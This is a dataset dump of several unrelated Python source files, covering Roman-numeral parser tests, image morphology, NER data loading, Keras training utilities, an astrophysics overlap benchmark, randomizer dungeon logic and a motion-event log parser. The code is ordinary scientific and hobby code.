\"\"\"\n TestMethods:\n Class containing unit tests for all three other methods in the program.\n \"\"\"\n\n def test_int_parser(self):\n \"\"\"\n test_int_parser():\n Object method used to test int parser output. Tests a few strs against\n expected outputs.\n \"\"\"\n self.assertEqual(ip.int_parser(\"4\"), \"IV\")\n self.assertEqual(ip.int_parser(\"10\"), \"X\")\n self.assertEqual(ip.int_parser(\"28\"), \"XXVIII\")\n self.assertEqual(ip.int_parser(\"49\"), \"XLIX\")\n self.assertEqual(ip.int_parser(\"100\"), \"C\")\n self.assertEqual(ip.int_parser(\"451\"), \"CDLI\")\n print(\"test_int_parser complete\")\n\n def test_intp_guardrails(self):\n \"\"\"\n test_intp_guardrails(self):\n Object method used to ensure the int parser refuses strings.\n \"\"\"\n with self.assertRaises(ValueError):\n ip.int_parser(\"swordfish\")\n print(\"test_intp_guardrails complete\")\n\n def test_intp_outputstr(self):\n \"\"\"\n test_intp_outputstr(self):\n Object method used to ensure the int parser returns well-formed strings.\n \"\"\"\n for i in [ip.int_parser(str(x)) for x in range(1, 10000)]:\n self.assertTrue(i.isupper())\n print(\"test_intp_outputstr complete\")\n\n def test_romnum_parser(self):\n \"\"\"\n test_romnum_parser(self):\n Object method used to verify the parser can correctly evaluate a few test\n strings.\n \"\"\"\n self.assertEqual(rp.romnum_parser(\"IV\"), 4)\n self.assertEqual(rp.romnum_parser(\"X\"), 10)\n self.assertEqual(rp.romnum_parser(\"XXVIII\"), 28)\n self.assertEqual(rp.romnum_parser(\"XLIX\"), 49)\n self.assertEqual(rp.romnum_parser(\"C\"), 100)\n print(\"test_romnum_parser complete\")\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Calls all tests if main.\n \"\"\"\n TEST_OBJ = TestMethods()\n TEST_OBJ.test_int_parser()\n TEST_OBJ.test_intp_guardrails()\n TEST_OBJ.test_intp_outputstr()\n TEST_OBJ.test_romnum_parser()\n","sub_path":"source/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128815190","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nimg = cv2.imread('pun.jpg',0) \r\nkernel = 
np.ones((5,5),np.uint8)\r\n\r\nerosion = cv2.erode(img,kernel,iterations = 1)\r\ndilation = cv2.dilate(img,kernel,iterations = 1)\r\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\r\nclosing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\r\noutline = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)\r\n\r\nplt.subplot(2,3,1),plt.imshow(img,cmap = 'gray')\r\nplt.title('Original'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,2),plt.imshow(erosion,cmap = 'gray')\r\nplt.title('Erosion'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,3),plt.imshow(dilation,cmap = 'gray')\r\nplt.title('Dilation'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,4),plt.imshow(opening,cmap = 'gray')\r\nplt.title('Opening'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,5),plt.imshow(closing,cmap = 'gray')\r\nplt.title('Closing'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(2,3,6),plt.imshow(outline,cmap = 'gray')\r\nplt.title('Outline'), plt.xticks([]), plt.yticks([])\r\n\r\nplt.show()\r\n","sub_path":"morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"434843498","text":"# -*- coding:utf-8 -*-\n\nfrom numpy import asarray\nimport codecs\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import to_categorical\nimport re\n\n\ndef load_data(path):\n file = codecs.open(path, 'rb', encoding='utf-8')\n string = file.read()\n data = [[row.strip().split() for row in sample.strip().split('\\n')] for\n sample in\n re.split('\\n\\n', string.strip())]\n file.close()\n for sentense in data:\n i = 0\n for word in sentense:\n # if word[1]=='O'.decode('utf-8') is True:\n if len(word) > 1:\n if word[1] == 'O'.decode('utf-8'):\n i = i + 1\n # print len(sentense)\n if i == len(sentense):\n data.remove(sentense)\n return data\n\n\ndef load_embedding():\n embedding_path = 'wiki.zh.text.traditional.text'\n embedding_index = dict()\n file = open(embedding_path)\n for line in file:\n values = line.decode('utf-8').split()\n word = values[0]\n coefs = asarray(values[1:], dtype='float32')\n embedding_index[word] = coefs\n file.close()\n\n return embedding_index\n\n\ndef word2id(embedding_index):\n word2idx = dict((w, i) for i, w in enumerate(embedding_index.keys()))\n return word2idx\n\n\ndef id2word(embedding_index):\n id2word = dict((i, w) for i, w in enumerate(embedding_index.keys()))\n return id2word\n\n\ndef traindata(train_path, word2idx):\n train_data = load_data(train_path)\n max_train_sentence = max(len(sentence) for sentence in train_data)\n train_x = [[word2idx.get(word[0].lower(), 0) for word in sentence if len(word) > 1] for sentence in train_data]\n train_x = pad_sequences(train_x, max_train_sentence)\n #tags = ['O', 'B-PER', 'I-PER', 'E-PER', 'B-LOC', 'I-LOC', 'E-LOC', 'B-ORG', 'I-ORG', 'E-ORG']\n tags = ['O', 'B-PER', 'I-PER', 'E-PER', 'B-LOC', 'I-LOC', 'E-LOC', 'B-ORG', 'I-ORG', 'E-ORG', 'S-ORG', 'S-PER','S-LOC']\n train_y = [[tags.index(word[1], 0) for word in sentence if len(word) > 1] for sentence in train_data]\n train_y = pad_sequences(train_y, max_train_sentence, value=-1)\n train_y = [to_categorical(i, num_classes=len(tags)) for i in train_y]\n\n return train_x, train_y\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34189672","text":"import tensorflow as tf\nimport keras\nimport 
time\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom sklearn.metrics import classification_report,confusion_matrix\nimport seaborn as sns\n\n#trainFcn is a function that retrain a model ten times and return different results concerning the training process\ndef trainFcn(model,name, epoch, datagen, x_train, y_train, x_test, y_test, x_val, y_val, batch_s, test):\n\t#initialize some useful variables\n\tsomme_accuracy, somme_loss, moy_time = 0, 0, 0\n\t#train the model for the first time\n\tn = 1\n\ti=0\n\thistory = [0]*n\n\tstart_time = time.time()\n\t#train the model and save the result in history[i]\n\tif test:\n\t\thistory[i] = model.fit(datagen.flow(x_train,y_train, batch_size = batch_s) ,epochs = epoch , validation_data = datagen.flow(x_val, y_val))\n\telse:\n\t\thistory[i] = model.fit(x_train,y_train, batch_size = batch_s ,epochs = epoch , validation_data = (x_val, y_val))\n\t#initializr the parameters to return later on\n\tbest_history = history[i]\n\tbest_loss = model.evaluate(x_test,y_test)[0]\n\tworst_loss = model.evaluate(x_test,y_test)[0]\n\tbest_accuracy = model.evaluate(x_test,y_test)[1]*100\n\tworst_accuracy = model.evaluate(x_test,y_test)[1]*100\n\t#save the model of the first iteration in case it is the best or the worst\n\tmodel.save(\"worst_model\"+name+\".h5\")\n\tmodel.save(\"best_model\"+name+\".h5\")\n\t#start measuring the avg loss and avg accuracy and time\n\tsomme_loss += best_loss\n\tsomme_accuracy += best_accuracy\n\tmoy_time += time.time() - start_time\n\t#retrain the model for 9 times that rest\n\ti=1\n\twhile (i best_accuracy:\n\t\t\tbest_accuracy = actual_accuracy\n\t\t\tbest_history = history[i]\n\t\t\tmodel.save(\"best_model\"+name+\".h5\")\n\t\t#save the worst model and worst accuracy\n\t\tif actual_accuracy < worst_accuracy:\n\t\t\tworst_accuracy = actual_accuracy\n\t\t\tmodel.save(\"worst_model\"+name+\".h5\")\n\t\t#save the best loss according to the loss measured in line 33\n\t\tif actual_loss < best_loss:\n\t\t\tbest_loss = actual_loss\n\t\t#save the worst loss \n\t\tif actual_loss > worst_loss:\n\t\t\tworst_loss = actual_loss\n\n\t\t#retrain again\n\t\ti+=1\n\t#measure the avg of accuracy, loss and time\n\tmoy_accuracy = somme_accuracy /n\n\tmoy_loss = somme_loss/n\n\tmoy_time /= n\n\t#return the all the results in an array\n\tresult = [moy_accuracy, moy_loss, best_accuracy, worst_accuracy, best_loss, worst_loss, moy_time, best_history]\n\treturn result\n\t\ndef plot_best_validation_loss_accuracy(train_acc, val_acc, epochs, train_loss, val_loss, name):\n\tfig , ax = plt.subplots(1,2)\n\tfig.set_size_inches(20,10)\n\tax[0].plot(epochs , train_acc , 'go-' , label = 'Training Accuracy')\n\tax[0].plot(epochs , val_acc , 'ro-' , label = 'Validation Accuracy')\n\tax[0].set_title('Training & Validation Accuracy')\n\tax[0].legend()\n\tax[0].set_xlabel(\"Epochs\")\n\tax[0].set_ylabel(\"Accuracy\")\n\tax[1].plot(epochs , train_loss , 'g-o' , label = 'Training Loss')\n\tax[1].plot(epochs , val_loss , 'r-o' , label = 'Validation Loss')\n\tax[1].set_title('Training & Validation Loss')\n\tax[1].legend()\n\tax[1].set_xlabel(\"Epochs\")\n\tax[1].set_ylabel(\"Loss\")\n\tplot_name = 'validation_loss'+name\n\tplt.savefig('{}.png'.format(plot_name))\n\ndef plot_muliplt_line_chart(plt, name, legend_names):\n\tplt.title('model accuracy')\n\tplt.ylabel('accuracy')\n\tplt.xlabel('epoch')\n\tplt.legend(legend_names, loc='upper left')\n\tplt.gca().set_ylim([0,1])\n\tplt.savefig('{}.png'.format(name))\n\t\ndef plot_confusion_matrix(y_test, predictions, 
name):\n\tcm = confusion_matrix(y_test,predictions)\n\tcm = pd.DataFrame(cm , index = ['0','1'] , columns = ['0','1'])\n\tplt.figure(figsize = (10,10))\n\tlabels = ['PNEUMONIA', 'NORMAL']\n\tsns.heatmap(cm,cmap= \"Accent\", linecolor = 'black' , linewidth = 1 , annot = True, fmt='',xticklabels = labels,yticklabels = labels)\n\t#save the confusion matrix\n\tplt.savefig('{}.png'.format(name))\n ","sub_path":"script/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"4041496","text":"#! /usr/bin/env python\n\n\"\"\"\n A test program completely separate from main chronostar for astr3005,\n in order to test out the performance of swig and suitability of\n the code to find overlap in a simple test.\n\"\"\"\n\nimport sys\nsys.path.insert(0,'..')\nimport time\nimport argparse\n\nif sys.version[0] == '2':\n timer = time.clock\nelif sys.version[0] == '3':\n timer = time.perf_counter\n\nimport numpy as np\nimport chronostar._overlap as overlap\n\ndef compute_overlap(A,a,A_det,B,b,B_det):\n \"\"\"Compute the overlap integral between a star and group mean + covariance matrix\n in six dimensions, including some temporary variables for speed and to match the \n notes.\n \n This is the first function to be converted to a C program in order to speed up.\"\"\"\n #Preliminaries - add matrices together. This might make code more readable? \n #Or might not.\n ApB = A + B\n AapBb = np.dot(A,a) + np.dot(B,b)\n \n #Compute determinants.\n ApB_det = np.linalg.det(ApB)\n \n #Error checking (not needed in C once shown to work?) This shouldn't ever happen, as \n #the determinants of the sum of positive definite matrices is\n #greater than the sum of their determinants \n if (ApB_det < 0) | (B_det<0):\n return -np.inf\n \n #Solve for c\n c = np.linalg.solve(ApB, AapBb)\n \n #Compute the overlap formula.\n overlap = np.exp(-0.5*(np.dot(b-c,np.dot(B,b-c)) + \\\n np.dot(a-c,np.dot(A,a-c)) )) \n overlap *= np.sqrt(B_det*A_det/ApB_det)/(2*np.pi)**3.0\n \n return overlap\n\ndef correctness(group_icov, group_mean, group_icov_det, star_icovs,\n star_means, star_icov_dets, nstars):\n \"\"\"\n Displays the result for each function, no differences should\n occur.\n \"\"\"\n \n # Using swig-numpy module with multiple stars per call\n swig_np_ms_ols = overlap.get_overlaps(\n group_icov, group_mean, group_icov_det, star_icovs,\n star_means, star_icov_dets, nstars)\n\n\n # Using swig-numpy module with multiple stars per call and log results\n group_cov = np.linalg.inv(group_icov)\n star_covs = np.zeros(star_icovs.shape)\n for i in range(nstars):\n star_covs[i] = np.linalg.inv(star_icovs[i])\n swig_np_ms_lnols = overlap.get_lnoverlaps(\n group_cov, group_mean, star_covs,\n star_means, nstars\n )\n\n # Compare with various implementations of calculating one star at a time\n for i in range(nstars):\n # Using numpy\n numpy_ols = compute_overlap(\n group_icov, group_mean, group_icov_det,\n star_icovs[i], star_means[i], star_icov_dets[i])\n\n # Using swig module (input passed as python list)\n swig_ols = overlap.get_overlap2(\n group_icov.flatten().tolist(), group_mean.flatten().tolist(),\n group_icov_det, star_icovs[i].flatten().tolist(),\n star_means[i].flatten().tolist(), star_icov_dets[i])\n\n # Using swig module (input passed as numpy arrays)\n swig_np_ols = overlap.get_overlap(\n group_icov, group_mean, group_icov_det, star_icovs[i],\n star_means[i], star_icov_dets[i])\n\n # # Using swig module (input passed 
as numpy arrays, output in log)\n # swig_np_lnol = overlap.get_lnoverlap(\n # group_icov, group_mean, group_icov_det, star_icovs[i],\n # star_means[i], star_icov_dets[i])\n\n assert np.isclose(numpy_ols, swig_np_ms_ols[i], rtol=1e-8)\n assert np.isclose(numpy_ols, swig_ols, rtol=1e-8)\n assert np.isclose(numpy_ols, swig_np_ols, rtol=1e-8)\n assert np.isclose(numpy_ols, np.exp(swig_np_ms_lnols[i]), rtol=1e-8)\n\n print(\"All implementations return same result to 8 sigfigs\")\n\ndef timings(group_icov, group_mean, group_icov_det,\n star_icovs, star_means, star_icov_dets, batch_size, noverlaps=10000):\n \"\"\"\n Executes each function a fixed number of times, timing for how\n long it takes.\n \"\"\"\n if (noverlaps <= 100000):\n npstart = timer()\n for i in range(noverlaps):\n result = compute_overlap(group_icov, group_mean, group_icov_det,\n star_icovs[0], star_means[0],\n star_icov_dets[0])\n numpy_time = timer() - npstart\n print(\"Numpy: \" + str(timer() - npstart))\n else:\n numpy_time = None\n print(\"Numpy: practically infinity seconds\")\n print(\" -> (approximately 5x 'Swig')\")\n\n swigstart = timer()\n for i in range(noverlaps):\n result = overlap.get_overlap2(group_icov.flatten().tolist(),\n group_mean.flatten().tolist(),\n group_icov_det,\n star_icovs[0].flatten().tolist(),\n star_means[0].flatten().tolist(),\n star_icov_dets[0])\n print(\"Swig: {} s\".format(timer() - swigstart))\n\n swignpstart = timer()\n for i in range(noverlaps):\n result = overlap.get_overlap(group_icov, group_mean, group_icov_det,\n star_icovs[0], star_means[0], star_icov_dets[0])\n end = timer()\n print(\"Swigging numpy: {} s\".format(end - swignpstart))\n\n swignpmultistart = timer()\n for i in range(int(noverlaps/batch_size)):\n result = overlap.get_overlaps(\n group_icov, group_mean, group_icov_det,\n star_icovs, star_means, star_icov_dets, batch_size)\n end = timer()\n\n print(\"Swigging numpy multi: {} s\".format(end - swignpmultistart))\n print(\" -> total module calls: {}\".format(noverlaps/batch_size))\n print(\" -> {} microsec per overlap\".\\\n format((end - swignpmultistart)/noverlaps*1e6))\n print(\" -> {} stars per module call\".format(batch_size))\n\n group_cov = np.linalg.inv(group_icov)\n star_covs = np.linalg.inv(star_icovs)\n\n newswignpmultistart = timer()\n for i in range(int(noverlaps/batch_size)):\n result = overlap.get_lnoverlaps(group_cov, group_mean,\n star_covs, star_means, batch_size)\n end = timer()\n\n print(\"Swigging numpy multi logged: {} s\".format(end - newswignpmultistart))\n print(\" -> total module calls: {}\".format(noverlaps/batch_size))\n print(\" -> {} microsec per overlap\".\\\n format((end - newswignpmultistart)/noverlaps*1e6))\n print(\" -> {} stars per module call\".format(batch_size))\n\n if numpy_time:\n print('Total speed up from basic Numpy is {}'.format(\n numpy_time / (end - newswignpmultistart)\n ))\n\n# ------------- MAIN PROGRAM -----------------------\nif __name__ == '__main__':\n\n print(\"___ Testing swig module ___\")\n #Parsing arguments\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-o', '--over', dest='o', default=10000,\n help='number of overlaps, def: 10000')\n parser.add_argument('-b', '--batch', dest='b', default=10000,\n help='batch size, must be <= and factor of noverlaps, def: 10000')\n args = parser.parse_args()\n\n noverlaps = int(args.o)\n batch_size = int(args.b)\n\n # ensuring batch_size is not greater than noverlaps\n if (batch_size > noverlaps):\n batch_size = noverlaps\n\n # Readjusting batch_size upwards to next 
best fitting amount\n    batch_size = int(noverlaps/(noverlaps/batch_size))\n\n    #Hard coding some sample data:\n    # 1 group inverse covariance matrix and determinant\n    # 1 group mean\n    # 2 star inverse covariance matrices and determinants\n    # 2 star means\n    # n=2: number of stars in sample data\n    group_icov = np.array(\n        [[ 0.08169095,-0.08676841, 0.01251394, 0., 0., 0. ],\n         [-0.08676841, 0.12519631,-0.03667345, 0., 0., 0. ],\n         [ 0.01251394,-0.03667345, 0.02503973, 0., 0., 0. ],\n         [ 0., 0., 0., 1.72222567, 0., 0. ],\n         [ 0., 0., 0., 0., 1.72222567, 0. ],\n         [ 0., 0., 0., 0., 0., 1.72222567]] )\n    group_icov_det = 9.06167723629e-05\n    group_mean = np.array([ -6.574, 66.56, 23.436, -1.327,-11.427, -6.527])\n\n    star_icovs = np.array(\n        [[[ 241.11814038, -20.73085201, -41.76131545, -20.04020342, 39.23379693,\n            3.56762733],\n          [ -20.73085201, 241.94306462, 65.75059643, 67.93158749,-112.38156699,\n            -9.01800703],\n          [ -41.76131545, 65.75059643, 93.00901268, 16.28943086,-186.48126616,\n            -26.35192182],\n          [ -20.04020342, 67.93158749, 16.28943086, 271.35148676,-206.47751678,\n            0.59099253],\n          [ 39.23379693,-112.38156699,-186.48126616,-206.47751678, 533.12434591,\n            56.54371174],\n          [ 3.56762733, -9.01800703, -26.35192182, 0.59099253, 56.54371174,\n            8.7246333 ]],\n\n         [[ 3.05924773e+02, -2.14497101e+02, 1.81987150e+02, 2.21167193e+01,\n            2.47836028e+01, -1.23364958e+01],\n          [ -2.14497101e+02, 3.91116549e+02, 7.84435767e+01, 1.12111433e+00,\n            3.67626279e+00, 1.26979547e+01],\n          [ 1.81987150e+02, 7.84435767e+01, 3.51440781e+02, 3.09116499e-01,\n            -1.90331451e+01, -1.68244431e+01],\n          [ 2.21167193e+01, 1.12111433e+00, 3.09116499e-01, 3.55043182e+01,\n            1.69515554e+01, -1.72936911e+01],\n          [ 2.47836028e+01, 3.67626279e+00, -1.90331451e+01, 1.69515554e+01,\n            4.75919822e+01, 1.21941690e+01],\n          [ -1.23364958e+01, 1.26979547e+01, -1.68244431e+01, -1.72936911e+01,\n            1.21941690e+01, 4.71046181e+01]]]\n        )\n\n    star_icov_dets = [ 1315806412.02, 520928339.853 ]\n\n    star_means = np.array(\n        [[ -4.76574406, 63.32299927, 39.42994111, -1.31855401,-10.77158563,\n            -8.24828843],\n         [ 17.58529809,-25.56197368,-20.64041645, -0.86932298, -6.32809279,\n            -6.419595 ]] )\n\n    nstars = star_icovs.shape[0]\n\n    print(\"Testing correctness\")\n    correctness(group_icov, group_mean, group_icov_det, star_icovs,\n                star_means, star_icov_dets, nstars)\n    star_icovs = np.tile(star_icovs[0], (batch_size,1,1))\n    star_means = np.tile(star_means[0], (batch_size,1))\n    star_icov_dets = np.tile(star_icov_dets[0], batch_size)\n\n    print(\"Testing timings\")\n    print(\"# of overlaps: {}\".format(noverlaps))\n    timings(\n        group_icov, group_mean, group_icov_det, star_icovs,\n        star_means, star_icov_dets, batch_size, noverlaps)\n\n    print(\"___ swig module passing all unit_tests ___\")\n\n","sub_path":"benchmarks/bm_overlap_methods.py","file_name":"bm_overlap_methods.py","file_ext":"py","file_size_in_byte":10579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"199909132","text":"from api import db\n\nclass RiskCalculator(db.Model):\n    \"\"\" RiskCalculator Model for storing risk calculator related details \"\"\"\n    __tablename__ = \"risk_calculator\"\n\n    id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n    name = db.Column(db.String(255), unique=True, nullable=False)\n    created_at = db.Column(db.DateTime, nullable=False)\n    updated_at = db.Column(db.DateTime, nullable=False)\n    deleted_at = db.Column(db.DateTime, nullable=False) \n\n    def __repr__(self):\n        return 
\"\".format(self.name)\n","sub_path":"Allgoo/andbank-service/api/risk_calculator/models/risk_calculator.py","file_name":"risk_calculator.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606593238","text":"#!/usr/bin/env python\n\nimport argparse\n\nimport matplotlib.pyplot as pp\nimport numpy as np\nfrom scipy.interpolate import spline\n\n\ndef plot(x, u):\n # A finer grid\n n = 300\n X = np.linspace(x[0], x[-1], n)\n\n # True function\n y = np.ones(X.shape)\n y[X > 0.5] = 0\n pp.plot(X, y, \"k\", label=\"exact\")\n\n interp = spline(x, u, X, order=3)\n pp.plot(X, interp, \"k--\", lw=2, label=\"numerical\")\n\n pp.legend(loc=\"upper right\", frameon=False)\n\n ax = pp.gca()\n for sp in [\"top\", \"right\"]:\n ax.spines[sp].set_visible(False)\n ax.xaxis.set_ticks_position(\"bottom\")\n ax.yaxis.set_ticks_position(\"left\")\n\n\ndef parseoctavefile(path):\n with open(path, \"r\") as f:\n for l in f:\n if not l.startswith(\"#\"):\n return np.fromstring(l, sep=\" \")\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"xfile\", help=\"Path to x coordinates\")\n parser.add_argument(\"ufile\", help=\"Path to u values\")\n parser.add_argument(\"out\", help=\"Path to output file\")\n\n args = parser.parse_args()\n\n x = parseoctavefile(args.xfile)\n u = parseoctavefile(args.ufile)\n\n plot(x, u)\n\n fig = pp.gcf()\n fig.set_size_inches(5, 5)\n fig.savefig(args.out, frameon=False, dpi=100)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numerical-methods/presentation/figures/context/octave.py","file_name":"octave.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"305384553","text":"from .requirements import *\r\nfrom .location import Location\r\nfrom locations import *\r\n\r\n\r\nclass DungeonColor:\r\n def __init__(self, options):\r\n entrance = Location(9)\r\n room2 = Location(9).connect(entrance, attack_hookshot_powder)\r\n room2.add(DungeonChest(0x314)) # key\r\n Location(9).add(OwlStatue(0x308), OwlStatue(0x30F)).connect(room2, STONE_BEAK9)\r\n room2_weapon = Location(9).connect(room2, attack_hookshot)\r\n room2_weapon.add(DungeonChest(0x30F)) # compass chest\r\n room2_weapon.add(DungeonChest(0x311)) # stone beak\r\n room2_weapon.add(DroppedKey(0x308))\r\n\r\n Location(9).connect(room2, AND(KEY9, MAGIC_POWDER)).add(DungeonChest(0x302)) # nightmare key after slime mini boss\r\n room3 = Location(9).connect(room2_weapon, KEY9) # After the miniboss\r\n room4 = Location(9).connect(room3, POWER_BRACELET) # need to lift a pot to reveal button\r\n room4.add(DungeonChest(0x306)) # map\r\n room4.add(DroppedKey(0x307))\r\n Location(9).add(OwlStatue(0x30A)).connect(room4, STONE_BEAK9)\r\n room5 = Location(9).connect(room4, KEY9) # before the boss\r\n boss = Location(9).connect(room5, AND(NIGHTMARE_KEY9, attack_no_bomb))\r\n boss.add(TunicFairy(0), TunicFairy(1))\r\n\r\n self.entrance = entrance\r\n","sub_path":"logic/dungeonColor.py","file_name":"dungeonColor.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"157129508","text":"import numpy as np\n\n\n# declare\nfs = 44100\nr = 1.5\ntheta = 0.3\nn = 2\nm = 3\nt = np.arange(0, 1, 1 / fs)\nx = np.array(r * np.cos(2 * np.pi * n * t - theta))\n\n# calc about a,b\na = 2 / fs * np.sum(x * np.cos(2 * np.pi * m * t))\nb = 2 / fs * 
np.sum(x * np.sin(2 * np.pi * m * t))\n\n# output\nprint(f\"a:{a}\")\nprint(f\"b:{b}\")\n","sub_path":"knishida/chapter03/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"605239346","text":"\"\"\"\nParses log files created by Tumbling Dice's Rana.\n\"\"\"\nimport argparse\nimport re\nfrom datetime import datetime as dt\nfrom itertools import islice\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom motion_event import MotionEvent\nfrom parse_eval import get_workbook\nfrom utils import motion_events_to_dataframe, get_match_dataframe, comp_perc\n\nEXCEL_PATH = \"/Users/u6000791/Box/Conservation/Rare Plants/Research Projects/Penstemon 2018-2019/DATA/Rana \" \\\n             \"Log/DATA_Rana Penstemon 2018_abu.xlsx\"\nSHEET_NAME = \"Visitors - Nova 1\"\n\nplt.style.use('ggplot')\n\n\ndef check_video(line):\n    \"\"\"\n    Check if the line contains a video file extension. If so, extract\n    and return the video filename from the line.\n    :param line: String of the latest line from the log file.\n    :return: String filename representing the video the log file\n    relates to.\n    \"\"\"\n    # Extract the video filename\n    if \".avi\" in line:\n        # Split the line based on file path separators and return the\n        # last chunk\n        video = line.split(\"/\")[-1]\n        return video\n\n\ndef check_event_start(line):\n    \"\"\"\n    Checks if the following lines will describe a new motion event.\n    :param line: String of the latest line from the log file.\n    :return: Boolean indicating if the following lines will describe\n    a new motion event.\n    \"\"\"\n    # Check if a new event is about to start\n    if \"new motion event\" in line:\n        return True\n    else:\n        return False\n\n\ndef get_time(line):\n    \"\"\"\n    If the line contains a regex match for a timestamp, process\n    and return it as a datetime object.\n    :param line: String of the latest line from the log file.\n    :return: Datetime object from the log string.\n    \"\"\"\n    # Group names below are only descriptive; the code uses the full match (group 0).\n    match = re.match(r\"^(?P<dow>\\w{3}) (?P<mon>\\w{3}) (?P<day>\\d{1,2}) \"\n                     r\"(?P<hour>\\d{2}):(?P<min>\\d{2}):(?P<sec>\\d{2}) (?P<year>\\d{4})\", line)\n    if match:\n        return dt.strptime(match.group(0), \"%a %b %d %H:%M:%S %Y\")\n\n\ndef check_spurious(current_event, line):\n    \"\"\"\n    If the string \"motion direction:\" is present in the line, sets\n    the passed MotionEvent object spurious property to False.\n    :param current_event: Object describing Rana motion event.\n    :param line: String of the latest line from the log file.\n    :return: None\n    \"\"\"\n    if \"motion direction:\" in line:\n        current_event.spurious = False\n\n\ndef parse_excel_file(path):\n    \"\"\"\n    Parses excel file describing motion events as manually evaluated by human viewers.\n    :param path: Path to excel file.\n    :return: Pandas Dataframe of data contained in Worksheet.\n    \"\"\"\n    wb = get_workbook(path)\n    ws = wb[SHEET_NAME]\n\n    # Convert worksheet into Pandas Dataframe\n    data = ws.values\n    cols = list(next(islice(data, 2, None)))\n    data = list(data)\n    data = (islice(r, 0, None) for r in data)\n    df = pd.DataFrame(data, columns=cols)\n\n    return df\n\n\ndef main(arguments):\n    # Parse the logs\n    motion_events = parse_log_files(arguments[\"path\"])\n\n    # Convert list of MotionEvents to a dataframe\n    me_df = motion_events_to_dataframe(motion_events)\n\n    # Parse the excel file containing human-decided pollinator events\n    df = parse_excel_file(EXCEL_PATH)\n\n    # Get a dataframe of rows with matching event times\n    match_df = get_match_dataframe(me_df, df)\n\n    # Plot the frequency 
distribution of spurious events\n plot_match_df(match_df)\n\n\ndef plot_match_df(match_df):\n fig, axes = plt.subplots(figsize=(6, 4), ncols=2)\n fig.suptitle(\"Frequency of Matching Motion Events\\nBetween Rana Logs and Human Evaluation\")\n spur_count = match_df.spurious.value_counts()\n spur_count.rename({True: \"Spurious\", False: \"Non-spurious\"}, inplace=True)\n spur_pie = spur_count.plot(kind=\"pie\", ax=axes[0], autopct=lambda pct: comp_perc(pct, spur_count.values))\n spur_pie.set_ylabel(\"\")\n spur_pie.set_title(\"Total\")\n group_count = match_df.groupby(match_df.index).spurious.value_counts()\n group_count.rename({True: \"Spurious\", False: \"Non-spurious\"}, inplace=True)\n group_pie = group_count.plot(kind=\"pie\", ax=axes[1], labels=None,\n autopct=lambda pct: comp_perc(pct, spur_count.values))\n group_pie.set_ylabel(\"\")\n group_pie.set_title(\"Grouped By Video\")\n group_pie.legend(labels=group_count.index, bbox_to_anchor=(0.35, 0.3), loc=\"upper left\", fontsize=10,\n bbox_transform=plt.gcf().transFigure)\n plt.show()\n\n\ndef parse_log_files(log_path):\n # Create a list to hold all motion event objects\n motion_events = []\n video = None\n current_event = None\n time = None\n for line in handle_file(log_path):\n video = check_video(line) or video\n\n # If we don't yet know the video name, we can skip ahead\n if not video:\n continue\n\n latest_time = get_time(line)\n if latest_time:\n time = latest_time\n\n if current_event:\n # If this is the first time stamp since a new motion event,\n # set the latest time as the event start time\n if current_event.start_time is None:\n current_event.start_time = time\n\n # Check if the line contains text to indicate the motion\n # event is non-spurious\n check_spurious(current_event, line)\n else:\n # Check if the line indicates a new motion event\n # has occurred\n new_event = check_event_start(line)\n if new_event:\n # Check if we already have a current event\n if current_event:\n # A new event is beginning so wrap up the current\n # event\n current_event.end_time = time\n\n # Create a new event object and add it to list of\n # events\n current_event = MotionEvent(video)\n motion_events.append(current_event)\n # Add end time for final motion event\n if current_event and current_event.end_time is None:\n current_event.end_time = time\n\n return motion_events\n\n\ndef handle_file(file_path, strip=True):\n \"\"\"\n Open the log file and yield each line back.\n :param file_path: Path to Rana log file.\n :param strip: Boolean indicated if newline characters should be\n stripped from each line before returning. 
